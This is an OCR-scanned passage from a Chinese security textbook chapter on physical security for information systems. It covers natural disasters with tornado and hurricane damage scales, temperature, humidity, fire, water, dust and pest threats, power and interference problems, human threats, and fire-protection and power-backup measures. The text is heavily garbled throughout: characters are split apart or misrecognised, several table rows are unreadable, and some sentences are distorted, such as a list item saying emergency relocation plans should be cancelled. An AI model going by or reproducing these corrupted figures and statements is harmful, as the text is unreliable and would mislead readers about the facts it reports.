学 习 完 本 章 之 后 ， 你 应 该 能 够 : 
概述 不 同类 型 的 物理 安全 威胁 ; 
评估 不 同 物理 安全 避免 和 缓解 措施 的 价值 ; 


理解 个 人 身份 验证 (PIV) 标准 在 物理 安全 中 的 作用 ; 


G 

© 讨论 物理 安全 破坏 的 恢复 措施 ; 

d 

© 解释 作为 物理 访问 控制 系统 一 部 分 的 PIV 机 制 的 应 用 。 





[PLAT14] 对 信息 系统 (Information System, IS) 安全 的 三 个 基本 要 素 进行 了 如 下 区 分 : 

o 逻辑 安全 (logical security): 保护 以 计算 机 为 基础 的 数据 免 受 基于 软件 和 基于 通信 的 威 
胁 。 本 书 的 大 部 分 内 容 讨 论 的 都 是 逻辑 安全 。 

e 物理 安全 (physical security); 也 叫 作 基础 设施 安全 (infrastructure security), RIF FFA 
数据 的 信息 系统 和 使 用 、 操 作 、 维 护 这 些 系统 的 人 员 的 安全 。 物 理 安全 也 必须 防止 任 
何 类 型 的 能 够 危及 逻辑 安全 的 物理 访问 或 者 人 侵 。 

e 场所 安全 (premise security): 也 被 称 作 公司 或 工厂 安全 。 保 护 一 个 完整 区 域内 的 人 和 
财产 、 设 施 和 建筑 ( 群 ) 的 安全 ， 而 且 这 也 是 法 律 、 规 章 和 最 基本 的 义务 所 要 求 的 。 场 
所 安全 提供 了 周边 安全 、 访 问 控制 、 烟 火 检 测 、 火 灾 控 制 、 环 境 保护 ， 以 及 通常 的 监 
AR. BRS E. 

本 章 主要 讨论 物理 安全 及 与 整体 安全 重 秋 的 一 些 部 分 。 我 们 分 析 了 针对 物理 安全 的 一 些 威 
胁 以 及 避免 、 减 轻 和 恢复 这 些 威胁 的 方法 。 为 了 实施 一 个 物理 安全 项 目 ， 组 织 必须 进行 风险 评 
估 ， 以 确定 用 于 确保 物理 安全 的 资源 数量 以 及 用 于 抵御 各 种 威胁 的 资源 分 配 情况 。 此 过 程 同 样 
适用 于 逻辑 安全 。 评 估 和 计划 过 程 已 在 第 14 章 和 第 15 章 中 讲述 过 。 


16.1 概述 


对 于 信息 系统 ， 物 理 安全 的 作用 就 是 保护 那些 进行 信息 存储 和 信息 处 理 的 物理 资产 的 安 
全 。 物 理 安 全 包括 两 个 互补 的 要 求 。 首 先 ， 物 理 安全 必须 防止 对 物理 基础 设施 ， 即 那些 维持 信 
息 系统 运转 的 物理 设备 的 损害 。 广 义 上 讲 ， 基 础 设施 包括 以 下 几 类 : 

e 信息 系统 硬件 ( information system hardware): 包括 数据 处 理 和 存储 设备 、 传 输 和 网 络 

设备 ， 以 及 离线 的 数据 存储 介质 。 我 们 可 以 在 此 类 别 中 包含 辅助 文档 。 

© 物理 设施 (physical facility): 安装 系统 和 网 络 组件 的 建筑 物 和 其 他 的 组 成 部 分 。 

e 支撑 设施 (supporting facility): 那些 支撑 信息 系统 运转 的 设施 ， 包 括 电 力 、 通 信服 务 和 

环境 控制 (温度 、 湿 度 等 ) 设施 。 

e AR (personnel): 包含 控制 、 维 护 和 使 用 信息 系统 的 人 。 

其 次 ， 物 理 安全 必须 阻止 那些 对 于 物理 基础 设施 的 误 用 ， 这 些 误 用 会 导致 被 保护 的 数据 被 
误 用 或 者 被 损坏 。 物 理 基础 设施 的 误 用 可 能 是 偶然 的 也 可 能 是 恶意 的 ， 它 包括 故意 破坏 、 盗 取 
设备 、 盗 取 拷 贝 、 盗 取 服 务 和 非 授权 进入 。 
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16.2 ”物理 安全 威胁 


这 一 三 ， 我 们 首先 看 一 下 能 够 对 信息 系统 构成 威胁 的 客观 环境 和 突 发 事件 。 有 很 多 对 这 些 
威胁 进行 分 类 的 方法 。 理 解 信 息 系 统 威 胁 的 型 谱 ( spectrum of threat) 是 很 重要 的 ， 这样， 那些 
负责 的 管理 员 就 能 够 保证 防御 措施 是 全 面 的 。 我 们 对 各 种 威胁 进行 以 下 分 类 : 

© 环境 威胁 

© 技术 威胁 

© 人 为 威胁 

我 们 从 讨论 日 然 灾 害 开始 ， 它 是 主要 的 但 不 是 唯一 的 环境 威胁 来 源 。 接 下 来 我 们 详细 地 探 
讨 环境 威胁 ， 然 后 是 技术 威胁 和 人 为 威胁 。 


16.2.1 自然 灾害 


对 于 数据 中 心 、 其 他 信息 处 理 设备 和 操作 它们 的 人 员 来 说 ， 自 然 灾 害 是 大 多 数 环境 威胁 的 
源头 。 通 过 对 不 同类 型 目 然 灾害 进行 风险 评估 并 采取 合适 的 预警 ， 是 可 以 防止 由 自然 灾害 造成 
的 重大 损失 的 。 

K 16-1 列 出 了 6 种 不 同类 型 的 目 然 灾 害 、 每 类 灾害 事件 的 典型 预告 时 间 、 是 否 需要 进行 
人 员 转 移 或 转移 是 否 可 行 ， 以 及 每 类 灾害 事件 的 持续 时 间 。 我 们 简单 地 评述 一 下 每 种 灾害 可 能 
会 引起 的 后 果 。 


表 16-1 自然 灾害 的 特征 


龙卷风 提前 预告 可 能 发 生 ， 地 点 不 确定 很 短 但 是 很 强 列 
if 许 没 ; 
ny Le Al Hes 





冰 暴 | 暴风 雪 希望 几 天 前 就 有 预告 也 许 没 办 法 转移 可 以 持续 几 天 
雷电 RUM ie FY DA Be BL ERE 可 能 需要 转移 时 间 短 但 是 可 复发 
洪水 通常 希望 提前 几 天 预告 也 许 没 办 法 转移 现场 大 概要 被 隔离 一 段 时 间 


源 自 : ComputerSite 工程 公司 (ComputerSite Engineering. Inc.) 


龙卷风 能 够 在 其 所 经 之 处 产生 超过 飓风 威力 的 大 风 。 对 于 设施 、 屋 项 和 外 部 设备 都 有 构成 
巨大 破坏 的 可 能 ， 还 可 能 有 空中 残 通 造成 的 损害 。 在 龙卷风 经 过 的 范围 之 外 ， 也 能 导致 局 部 设 
施 不 可 用 和 通信 的 暂时 中 断 ， 这 些 破 坏 通 常 比较 容易 恢复 。 龙 卷 风 所 造成 破坏 的 严重 程度 可 以 
参考 表 16-2 ( 蕨 田 龙卷风 等 级 ) 列 出 的 定 级 标准 。 


表 16-2 MALEMSAR 





种 类 破坏 程度 描述 

m 40~72 英里 /小 时 轻 度 的 破坏 。 一 定 程度 地 破坏 烟 向 ; 折断 树枝 ; 推倒 根部 较 浅 的 树 ; 标 
( 64 一 116 千 米 /小 时 ) 志 牌 损坏 

ši 73~112 英里 /小 时 中 等 程度 的 破坏 。 下 限 是 飓风 的 起 始 速度 ; 房 顶 表面 剥落 ; 移动 房屋 地 
(117 一 180 千 米 /小 时 ) | 基 被 推倒 或 掀 翻 ， 汽车 被 推 下 公路 
113~157 英里 /小 时 相当 大 的 破坏 。 房 项 被 撕 下 ; 移动 房屋 被 损毁 ; 大 篷车 被 推倒 ; 大 树 被 


Be (181~252 千 米 /小 时 ) | 折断 或 连 根 拔 起 ;犹如 轻型 导弹 所 产生 的 破坏 


158 一 206 英里 /小 时 严重 破坏 。 房 项 和 一 些 墙 体 从 结实 的 房屋 上 被 吹 走 或 吹 倒 ; 火车 被 掀 翻 ; 
(253~332 千 米 / 小 时 ) | 大 多 数 的 树木 连 根 氢 起 ; 较 重 的 小 汽车 被 吹 离 地 面 和 被 抛 出 


360 ARQ 管理 问题 


(Zz) 





破坏 程度 描述 


a BERPED 5 45 IE TI; AEAEE 
(333 ~ 418 千 米 /小 时 ) | 距离 ， 小 汽车 被 吹 飞 ， 犹 如 大 型 导弹 造成 的 破坏 
me 难以 想象 的 破坏 。 坚 固 结构 的 房屋 连 地 基 一 并 被 吹 走 相 当 一 段 距离 ， 并 
(419 ~ 512 FX /小 时 ) | 瞬间 瓦解 ; 汽车 大 小 的 导弹 在 空中 飞行 超过 100 码 的 距离 ; 树 被 剥皮 
热带 气旋 是 最 具有 毁灭 性 的 目 然 灾 害 ， 它 包括 朵 风 、 热 带 风 暴 和 台风。 飓风 可 能 造成 重大 
的 结构 损坏 和 外 围 设施 的 损坏 ， 这 与 飓风 的 威力 有 关 。 在 恨 风 效 击 的 范围 之 外 ， 对 公共 基础 设 
施 、 公 用 工程 和 通信 还 可 能 造成 区 域 性 的 潜在 破坏 。 如 果 现 场 工作 必须 继续 进行 ， 那 么 要 为 工 
作 人 员 提 供应 急 处 理 设备 ， 也 就 是 说 备用 发 电机 是 需要 的 。 更 进一步 ， 负 责 现场 的 管理 者 也 许 
需要 启动 专门 的 灾后 安全 措施 ， 比 如 说 ， 武 装 警 卫 。 


K 16-3 总 结 了 已 被 广泛 应 用 的 萨 非 尔 /辛普森 恨 风 定 级 表 。 通 常 ， 每 类 4 个 因素 中 的 任 
意 一 个 增加 都 会 加 剧 损毁 程度 [PIEL08]。 


表 16-3 BIER /辛普森 飓风 等 级 表 


= FEL RENARE 

j 74~95 英里 /小 时 4 一 5 英尺 a 
(119 一 153 公里 /小 时 ) (1 一 2 米 ) 

96 一 110 英里 /小 时 6 一 8 英尺 中 等 
(154~177 公里 /小 时 ) (2 一 3 米 ) üj 
111~130 英里 /小 时 9 一 12 英尺 a 

3 (178~209 公里 / 小时) (3 一 4 米 ) 范围 | 
131~155 英里 /小 时 13 一 18 英尺 

( 210 一 249 公里 / 小 时 ) (4~5 %) 极端 的 
> 155 英里 / 小 时 > 18 英尺 

(> 249 公里 /小 时 ) (> 5) 灾难 性 的 


大 地 震 是 最 大 的 潜在 破坏 事件 并 且 没 有 预告 就 发 生 。 位 于 震中 附近 的 设施 也 许 会 遭受 重大 
的 损害 ， 甚 至 是 完全 的 毁灭 ， 也 会 对 数据 中 心 和 其 他 的 IS 设施 造成 严重 的 和 长 期 的 损坏 。 内 
部 损坏 的 例子 ， 包 括 无 文 染 的 电脑 硬件 和 站 内 的 基础 设备 倾倒 ， 也 包括 活动 地 板 的 塌陷 。 人 员 
则 会 受到 雄 玻 璃 和 空中 残骸 的 威胁 。 现 场 之 外 ， 在 大 地 震 的 震中 附近 ， 损 坏 通 常 都 不 小 于 强烈 
飓风 所 造成 的 损坏 。 朵 风 无 法 损坏 的 设施 ， 比 如 公路 和 桥梁 ， 其 可 能 会 被 地 震 拱 毁 或 者 损坏 ， 
这 就 阻止 了 油料 和 其 他 物资 的 运输 。 

如 果 外 部 设备 和 建筑 物 没 有 设计 成 可 以 承受 严重 的 冰雪 积压 ， 冰 者 和 暴风 雪 就 能 够 导致 
IS 设施 的 损坏 。 在 野外 ， 可 能 会 有 更 大 范围 内 的 通信 和 功能 设施 的 损坏 ， 而 且 公 路 变 得 危险 
或 者 无 法 通过 。 

雷击 的 结果 也 可 能 是 毫 无 损伤 ， 也 可 能 造成 重大 灾害 的 。 损 坏 程度 与 雷电 的 接近 程度 以 及 
接地 的 浪 涌 电压 保护 器 的 效力 有 关 。 在 户外 ， 可 能 会 造成 电力 中 断 ， 也 有 可 能 引发 火灾 。 

对 于 低 海 拔 、 篆 遭受 洪水 侵害 的 地 区 和 那些 位 于 严重 洪 游 地 区 的 设施 ， 我 们 考虑 更 多 的 是 
洪水 的 损害 。 洪 水 造成 的 损坏 可 能 是 严重 的 ， 会 造成 长 时 间 的 影响 并 且 需 要 大 量 清 理工 作 。 


16.2.2 ”环境 威胁 


这 类 威胁 是 就 环境 条 件 来 说 的 ， 它 可 能 中 断 信息 系统 的 服务 或 者 损坏 其 中 存储 的 数据 。 在 
户外 ， 可 能 会 对 公共 设施 造成 区 域 性 的 严重 损坏 。 在 强烈 飓风 的 破坏 下 ， 可 能 要 用 几 天 、 几 周 
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甚至 是 几 年 才能 从 这 个 破坏 事件 中 恢复 过 来 。 

不 合适 的 温度 和 湿度 计算 机 和 相关 设备 必须 在 一 定 的 温度 范围 内 工作 。 大 多 数 计算 机 
被 设计 为 在 10~32C Zia] (50~90 F ) 运行 。 在 这 个 范围 之 外 ， 系 统 可 以 继续 运行 但 是 可 
能 会 产生 不 可 预料 的 结果 。 如 果 计 算 机 周围 的 环境 温度 升 得 太 高 ， 计 算 机 又 不 能 使 自己 充 
分 冷却 ， 那 么 内 部 的 组 件 就 会 被 烧 坏 。 如 果 温 度 变 得 太 低 ， 当 打开 电源 的 时 候 ， 计 算 机 不 
能 承受 热 冲 击 ， 就 会 导致 电路 板 或 者 集成 电路 破裂 。 表 16-4 给 出 了 发 生 永久 损坏 的 温度 临 
界 点 。 


表 16-4 ”对 计算 机 资源 造成 损坏 的 温度 阅 值 


组 件 或 者 介质 开始 造成 损坏 的 周围 环境 的 持续 温度 
软盘 、 磁 带 等 38 (100 下 ) 
光学 介质 49% (120 F ) 
硬盘 66 (150 F) 
计算 机 设备 79 (175 TF) 
高 压 输电 线 的 热塑性 绝缘 物 125 (257 F) 
纸 制 品 177% (350 F ) 


注 : 数据 来 自 国 家 火灾 保护 协会 


另 一 个 与 温度 有 关 的 问题 是 设备 的 内 部 温度 ， 它 可 能 比 室内 的 温度 高 出 很 多 。 计 算 机 相关 
设备 都 有 自己 的 散热 和 冷却 机 制 ， 但 它们 可 能 依靠 或 者 受到 外 部 条 件 的 影响 。 这 些 条 件 包括 : 
不 正常 的 外 部 温度 ， 电 力 或 者 热力 供应 中 断 ， 通风、 空气 调节 (HVAC) 服务 的 中 断 ， 以 及 排 
气 口 的 阻塞 。 

潮湿 也 可 以 对 电气 电子 设备 造成 威胁 。 长 期 暴露 在 潮湿 环境 下 将 导致 设备 被 腐蚀 。 冷 凝 也 
能 影响 到 磁性 和 光学 存储 介质 。 冷 凝 还 会 导致 短路 ， 因 此 会 造成 线路 板 损坏 。 潮 湿 也 会 产生 电 
流 效 应 ， 它 将 导致 电镀 ， 就 是 指 金 属 会 从 一 个 接头 慢 慢 地 移动 到 相 邻 的 男 一 个 接头 ， 最 后 使 两 
个 接头 连接 在 一 起 。 

干燥 也 是 应 该 关注 的 问题 。 在 长 期 的 干燥 环境 下 ， 某 些 材 料 可 能 发 生 形变 ， 从 而 影响 其 性 
能 。 同 样 ， 静 电 也 会 引发 问题 。 一 个 带电 荷 的 人 或 者 物体 ， 能 够 通过 放电 来 损坏 电子 设备 。 即 
使 是 10V 以 下 的 静电 释放 也 能 损坏 部 分 敏感 电子 线路 ， 如 果 达 到 数 百 伏 的 静电 释放 ， 那 就 能 
对 各 种 电子 线路 产生 很 大 的 损坏 。 因 为 人 体 的 静电 释放 能 够 达到 几 千 伏 ， 所 以 这 是 一 个 不 容 忽 
视 的 威胁 。 

一 般 来 说 ， 为 了 避免 出 现 过 分 潮湿 或 者 过 分 干燥 的 情况 ， 相 对 湿度 应 该 保持 在 40% ~ 60% 
之 间 。 

火 和 烟 ”大 概 最 可 怕 的 物理 威胁 就 是 火灾 了 。 它 对 人 们 的 生命 和 财产 都 构成 威胁 。 威 胁 不 
仅仅 来 自 直 接 的 火焰 ， 还 来 自 热 、 释 放 的 毒气 、 灭 火 时 用 到 的 水 以 及 烟 。 而 且 ， 火 灾 还 能 导致 
一 些 公共 设施 损毁 ， 尤 其 是 电力 设施 。 

火灾 导致 温度 随 着 时 间 而 升 高 ， 而 且 在 一 般 的 建筑 物 中 ， 火 灾 的 影响 齐 从 图 16-1 中 的 曲 
线 。 为 了 了 解 火 灾 造 成 的 损害 ， 表 16-4 和 表 16-5 给 出 了 不 同 物 质 的 熔点 或 者 被 损坏 的 温度 ， 
这 也 就 说 明了 在 火灾 发 生 多 长 时 间 之 后 那些 损坏 开始 发 生 。 

由 火灾 引起 的 烟 造成 的 损坏 也 许 会 草 延 。 烟 是 一 种 研磨 剂 。 它 聚集 在 没有 密封 的 磁盘 、 光 
盘 和 磁带 驱动 器 的 头 部 。 电 气 火 灾 能 够 产生 辛辣 的 烟 ， 这 些 烟 可 能 对 别 的 设备 造成 损坏 ， 也 可 
能 是 有 毒 的 或 是 可 致癌 的 。 
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最 常见 的 火灾 威胁 是 发 生 在 设施 内 部 的 火灾 。 就 像 我 们 后 面 要 讨论 的 ， 我们 可 以 末 取 很 多 
措施 来 阻止 和 减轻 损坏 。 男 一 个 所 要 面 对 的 不 可 控制 的 威胁 是 野火 。 在 美国 西部 、 澳 大 利 亚 的 
一 些 地 方 以 及 很 多 其 他 的 国家 ， 野 火 是 一 个 真正 需要 关注 的 威胁 。 
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持续 时 间 ， 小 时 
图 16-1 测试 火灾 对 建筑 物 影响 的 标准 温度 - 时 间 关 系 
表 16-5 温度 影响 


水 的 损害 ”很 显然 ， 靠 近 计 算 机 设备 的 水 或 者 其 他 的 液体 对 设备 造成 了 一 种 威胁 。 主 要 的 
危害 就 是 线路 短路 ， 如 果 电 路 板 的 一 条 线路 带 有 电压 ， 男 一 条 线路 接地 ,那么 水 就 在 这 两 条 线 
路 之 间 搭 起 了 一 座 桥 ， 也 就 发 生 了 短路 。 输 水 时 ， 比 如 说 在 水 管 中 的 水 ,以 及 由 于 雨 、 雪 和 冰 
等 天 气 制造 的 水 都 会 造成 威胁 。 一 根 水 管 可 能 由 于 管道 上 的 缺陷 或 者 冰冻 而 破裂 。 喷 水 灭火 系 
统 ， 尺 管 具有 防火 功能 ,但 其 对 于 计算 机 系统 、 纸 和 电子 存储 设备 来 说 就 是 一 个 重要 的 威胁 。 
这 个 系统 可 能 由 于 错误 的 温度 传感器 而 被 启动， 或 者 水 管 破裂 ， 都 有 可 能 使 水 进入 到 计算 机 
房 。 对 于 大 型 计算 中 心 ， 应 该 保证 其 安装 在 水 源 所 在 楼 层 两 层 以 上 的 楼 层 。 由 于 洗手 间 洲 水 而 
造成 设备 损坏 就 是 这 种 威胁 的 一 个 例子 。 

很 少 发 生 但 是 更 具 破 坏 力 的 是 洪水 。 大 多 数 的 损害 来 自 于 水 中 的 悬浮 物 。 洪 水 留 下 的 淤泥 
是 非常 难以 清理 干净 的 。 

化 学 、 辐 射 和 生物 危害 ”化 学 、 辐 射 和 生物 威胁 正 呈 现 增长 的 态势 ， 既 有 来 自 于 有 意 攻 击 
的 威胁 ， 也 有 来 自 于 偶然 事故 的 威胁 。 那 些 具有 破坏 性 的 物质 不 应 该 在 一 个 安装 有 信息 系统 的 


PICE PRPRAEHEL 363 


环境 中 出 现 ， 但 是 意外 或 者 有 意 的 人 侵 都 是 可 能 的 。 单 位 附近 的 有 害 物质 的 泄漏 (比如 说 ， 一 
个 运送 有 害 物 质 的 汽车 翻 了 ) 能 通过 通风 系统 或 者 打开 的 窗口 侵入 ; 又 如 辐射 可 以 穿 透 围墙 。 
此 外 ， 由 于 附近 的 泄漏 可 能 必须 撤离 工作 人 员 ， 从 而 工作 中 断 。 洪 水 也 能 导致 生物 污染 或 者 化 
学 污染 。 

一 般 来 说 ， 这 些 人 危害 主要 是 针对 工作 人 员 的 。 但 同时 ， 辐 射 和 化 学 事故 也 能 导致 电子 设备 
损坏 : 

灰尘 ”灰尘 非常 普遍 但 却 经 常 被 忽略 。 尽 管 一 般 的 设备 都 具有 一 定 的 防 尘 能 力 ， 但 即使 是 
纸 和 纺织 品 中 的 纤维 都 具有 磨损 和 轻微 导电 的 功能 。 更 大 规模 的 灰尘 来 自 于 一 些 事故 ,例如 ， 
附近 建筑 物 的 定向 爆破 或 者 暴风 带 来 的 野火 的 尘埃 。 一 个 更 可 能 的 来 源 就 是 在 建筑 物 内 部 ， 由 
建造 或 维修 产生 。 

具有 运动 部 件 的 设备 ， 是 最 容易 受到 灰尘 影响 而 损坏 的 ， 比 如 旋转 的 存储 介质 和 计算 机 的 
风 局 。 灰 全 容易 在 通风 设备 处 聚集 并 降低 散热 器 的 冷却 功能 。 

害虫 更 加 让 人 感觉 不 舒服 的 物理 威胁 是 害虫 ， 包 括 各 种 各 样 的 存活 的 生物 ， 如 霉菌 、 昆 
虫 和 咕 齿 类 动物 。 测 湿 容 易 引 起 菌 类 生长 和 发 霉 ， 这 对 人 员 和 设备 都 是 有 害 的 。 昆 虫 ， 尤 其 是 
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16.2.3 ”技术 威胁 


这 类 威胁 与 电源 和 电磁 辐射 有 关 。 

电力 ”电力 对 于 一 个 信息 系统 的 运行 是 必需 的 。 所 有 系统 中 的 电气 和 电子 设备 都 需要 电力 ， 
而 且 大 多 数 都 要 求 不 间断 地 供电 。 电 力 使 用 问题 可 大 致 分 为 三 类 : 电压 过 低 、 电 压 过 高 、 噪 声 。 

当 IS 设备 获得 的 电压 比 正常 工作 的 电压 低 时 就 发 生 欠 电压 ( undervoltage) WZ, REE 
现象 表现 为 从 电源 电压 的 暂时 降低 ， 到 电灯 暗淡 (长 期 的 电压 过 低 )， 再 到 停机 。 多 数 计算 机 
都 被 设计 为 可 以 在 低 于 正常 电压 20% 的 低压 环境 下 工作 ， 而 不 会 发 生 关 机 和 运行 错误 。 在 更 
低 电 压 或 停电 的 环境 下 持续 几 个 毫秒 将 引起 系统 关闭 。 一 般 来 说 ， 不 会 发 生 设备 的 损坏 ， 但 会 
导致 服务 中 断 。 

更 严重 的 问题 是 过 电压 ( overvoltage) 现象 。 由 于 公司 供电 异常 、 一 些 内 部 线路 错误 或 者 
电击 都 能 引起 电压 浪 涌 。 甚 损坏 程度 是 关于 浪 涌 的 强度 、 持 续 时 间 、 在 设备 和 电源 间 连 接 的 浪 
涌 电 压 保护 器 的 效率 的 函数 。 一 个 强度 足够 大 的 浪 涌 能 毁坏 硅 组 件 ， 包 括 处 理 器 和 存储 僚 。 

电源 线 同 时 也 是 噪声 的 传导 器 。 在 很 多 情况 下 ， 这 些 噪声 信号 可 以 使 用 电源 的 滤波 电路 来 
消除 ,但 和 若 和 电子 设备 的 内 部 信号 相互 影响 ， 就 可 能 引起 逻辑 错误 。 

电磁 干扰 ， 沿 着 电源 线 产生 的 噪声 不 过 是 电磁 干扰 〈《 ElectroMagnetic Interference, EMI) 
源 中 的 一 种 。 马 达 、 风 扇 、 大 型 设备 甚至 是 其 他 的 计算 机 都 能 产生 电子 噪声 ， 它 可 以 使 你 正在 
使 用 的 计算 机 出 现 断 断 续 续 的 问题 。 这 种 噪声 能 够 在 电线 附近 的 空间 中 传送 。 

另 一 种 EMI 源 ， 来 自 附近 的 广播 电台 和 微波 天 线 的 高 强度 发 射 信 号 。 即 使 是 低 强度 设备 ， 
比如 说 蜂窝 电话 ， 也 能 干扰 到 敏感 的 电子 设备 。 


16.2.4 人 为 的 物理 威胁 


人 为 的 物理 威胁 比 前 面 提 到 的 环境 和 技术 威胁 更 加 难以 处 理 。 人 为 威胁 比 其 他 种 类 的 物理 
威胁 更 加 难以 预知 。 更 糟糕 的 情况 是 ， 人 为 威胁 被 特别 设计 来 攻破 预防 措施 ， 并 且 是 寻找 最 胸 
弱 的 点 来 攻击 。 我 们 可 以 把 这 些 威胁 分 成 以 下 儿 类 : 

o 非 授 权 的 物理 访问 : 那些 不 是 雇员 的 人 根本 不 应 该 出 现在 这 个 建筑 或 综合 建筑 群 里 ， 

除非 是 在 有 授权 的 人 的 陪同 下 进入 。 信 息 系 统 资 产 ， 例 如 服务 器 、 主 计算 机 、 网 络 设 


备 和 存储 网 络 ， 一 般 都 是 放置 在 一 个 受 限 制 的 区 域内 。 有 权 进 入 这 里 的 人 通常 也 都 仅 
限于 一 定数 量 的 工作 入 员 。 非 授权 的 物理 访问 可 能 导致 其 他 的 威胁 ， 比 如 盗 穷 、 故 意 
破坏 或 者 误 用 。 

AA: 这 种 威胁 包括 对 设备 的 盗 究 和 对 数据 通过 拷贝 进行 的 盗 鳃 。 偷 听 和 措 线 听 也 

属于 这 种 类 型 。 盗 穷 可 能 发 生 在 那些 非法 访问 的 外 部 人 员 或 者 内 部 人 员 的 喘 上 。 

o 故意 破坏 : 这 种 威胁 包括 对 设备 和 数据 的 毁坏 。 

© RA: 这 种 威胁 包括 授权 用 户 对 资源 的 不 适当 的 使 用 ， 同 样 也 包括 那些 未 授权 的 人 对 
资源 的 使 用 。 


16.3 ”物理 安全 的 防御 和 减缓 措施 


这 一 节 ， 我 们 着 重 讨论 一 系列 防御 物理 攻击 的 技术 ， 或 者 在 某 些 情况 下 ， 只 是 阻止 物理 
攻击 的 技术 。 首 先 分 析 应 对 环境 和 技术 威胁 的 技术 ， 然 后 再 讨论 怎样 预防 人 为 威胁 。 包 括 ISO 
27002 (信息 安全 管理 实施 细则 ，2013 年 ) 和 NIST SP 800-53 (联邦 信息 系统 推荐 安全 控制 ， 
2015 年 1 H) 的 标准 包含 与 物理 和 环境 安全 相关 的 控制 清单 ， 如 表 15-2 和 表 15-3 所 示 。 

一 种 通常 的 防范 措施 是 使 用 云 计 算 技 术 。 从 物理 安全 的 角度 看 ， 云 计算 有 一 个 明显 的 优 
势 ， 即 减少 了 信息 系统 资产 本 地 化 的 需求 ， 使 得 重大 的 数据 资产 不 受 本 地 物理 威胁 的 影响 。 具 
体内 容 请 参见 第 13 章 关 于 云 计算 安 全 的 讨论 。 


16.3.1 环境 威胁 


我 们 讨论 这 些 威胁 的 顺序 与 16.2 节 相 同 。 

不 合适 的 温度 和 湿度 ”处理 这 个 问题 主要 还 是 依靠 环境 控制 设备 ， 这 些 设 备 要 有 合适 的 功 
能 和 适合 的 传 感 硕 来 对 超出 闪 值 的 事件 进行 报警 。 除 此 以 外 ， 首 先是 保证 电力 供应 ， 后 面 将 对 
此 进行 讨论 。 

KAA ”火灾 处 理 包 括 预 和 警 、 防 御 措施 和 灾情 减轻 ， 这 是 一 个 组 合 策略 。[MART73] 提供 
了 以 下 必要 的 措施 : 

1. 选择 发 生 灾 害 可 能 性 最 小 的 地 点 。 一 个 受到 良好 保护 的 计算 机 房 或 者 IS 设施 中 几乎 很 
少 发 生火 灾 。IS 设施 应 该 选择 建 在 火 、 水 、 烟 等 灾害 发 生 概 率 最 小 的 地 方 附近 。 与 其 他 活动 隔 
离 的 墙 至 少 应 该 有 一 小 时 的 防火 等 级 。 

2. 空调 管道 和 其 他 管道 要 设计 为 不 能 传播 火灾 。 目 前 已 有 针对 这 些 设计 的 标准 原则 和 说 明 。 

3. 设备 摆 放 的 位 置 使 损害 最 小 化 。 

4. 良好 的 内 务 处 理 。 档 案 和 可 燃 性 物质 不 允许 存放 在 IS 区 域 中 。IS 设备 的 整洁 安装 也 是 
非常 重要 的 。 

5. 准备 的 手动 灭火 器 必须 是 可 用 的 ， 有 清晰 标识 ， 并 定期 进行 测试 。 

6. 安装 上 自动 灭火 器 。 目 动 灭 火器 的 安装 必须 保证 不 会 对 设备 造成 损坏 ， 不 会 对 人 员 造 成 危险 。 

7. KAP AS. FETS 房间 的 探测 右 必 须 有 声音 报警 并 同时 有 外 部 控制 ， 这 样 在 启动 自动 
灭火 器 之 前 有 一 个 延 时 以 便 人 工 进行 干预 。 

8. 配备 电源 开关 。 这 个 开关 必须 标识 清晰 并 且 不 能 被 阻塞 。 所 有 的 人 员 都 必须 熟悉 电源 关 
闭 过 程 。 

9. 张贴 应 急 处 理 程序 。 

10. 人 员 安 全 。 在 设计 建筑 物 的 布局 和 应 急 处 理 程序 时 必须 考虑 到 人 员 的 安全 。 

11. 重要 的 档案 必须 保存 在 耐火 的 柜子 或 者 保险 库房 中 。 

12. 用 来 进行 文件 重 构 的 记录 必须 异地 存储 。 
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13. 所 有 的 最 新 程序 副本 必须 异地 存储 。 

14. 在 其 他 地 方 使 用 计算 机 设备 的 应 急 计 划 应 该 被 取消 。 

15. 保险 公司 或 者 当地 消防 部 门 应 该 检查 这 些 设施 。 

为 了 解决 烟 产 生 的 威胁 ,管理 人 员 应 该 在 每 一 个 存放 计算 机 设备 的 屋子 里 ， 在 活动 地 板 的 
下 面 和 悬 吊顶 棚 的 上 面 安装 烟 探 测 需 。 在 计算 机 房 内 应 该 禁止 吸烟 。 

对 于 野火 ， 有 效 的 应 对 措施 是 有 限 的。 防火 建筑 技术 造价 高 昂 并 且 也 很 难 证 明 是 有 效 的 。 

水 的 损害 ”对 于 水 产生 的 威胁 进行 防御 和 减少 损失 的 措施 必须 围绕 以 下 几 种 威胁 进行 。 对 
于 管道 泄漏 ， 重 新 铺设 具有 潜在 威胁 的 管道 ， 很 难 证 明 是 有 效 的 。 根 据 供水 管道 的 布局 知识 ， 
合理 地 布置 设备 是 一 个 聪明 的 解决 方案 。 所 有 阀门 的 位 置 应 该 是 清晰 可 见 的 ， 或 者 至 少 是 清楚 
地 在 文档 中 标识 的 。 负 责 人 必须 知道 在 发 生 突 发 事故 时 的 应 急 处 理 程序 。 

为 了 处 理 水 管 泄漏 和 其 他 形式 的 水 灾 ， 传 感 器 是 很 重要 的 。 水 传感器 应 该 被 放置 在 计算 机 
房 的 地 板 上 ， 以 及 活动 地 板 下 面 ， 并 且 在 发 生 水 泄漏 的 时 候 能 够 自动 关闭 电源 。 

其 他 环境 威胁 ”为 了 应 对 化 学 、 生 物 和 辐射 威胁 ， 可 使 用 特定 的 技术 方法 ,包括 基础 设施 
设计 、 传 感 胡 的 设计 和 安装 、 灾 情 缓解 程序 、 人 员 训 练 ， 等 等 。 这 些 领域 的 标准 和 技术 也 一 直 
在 发 展 。 

对 于 灰尘 的 危害 ， 显 而 易 见 的 防御 方法 就 是 限制 灰尘 的 进入 ， 方 法 包括 防 尘 装置 的 正常 使 
用 和 维护 ， 以 及 对 IS 房间 的 定期 维护 。 

对 于 生物 侵扰 ， 定 期 控制 害虫 是 必需 的 ， 这 首先 要 从 维持 一 个 干净 整洁 的 环境 开始 。 


16.3.2 技术 威胁 


为 了 处 理 短暂 的 电力 中 断 问题 ， 应 该 为 每 一 个 重要 的 设备 配备 一 个 不 间断 电源 (Uninterru- 
ptible Power Supply, UPS). UPS 是 一 个 备用 电池 单元 ， 它 能 为 处 理 器 、 监 控 器 和 其 他 的 设备 
提供 一 段 时 间 的 电力 。UPS 还 具有 浪 涌 保 护 器 、 电 源 品 声 过 滤器 和 在 电池 电力 低 的 时 候 自动 关 
闭 设备 等 功能 。 

对 于 更 长 时 间 的 断 电 和 电压 过 低 的 情况 ， 关 键 的 设备 应 该 被 连接 到 应 急电 源 上 ， 比 如 一 台 
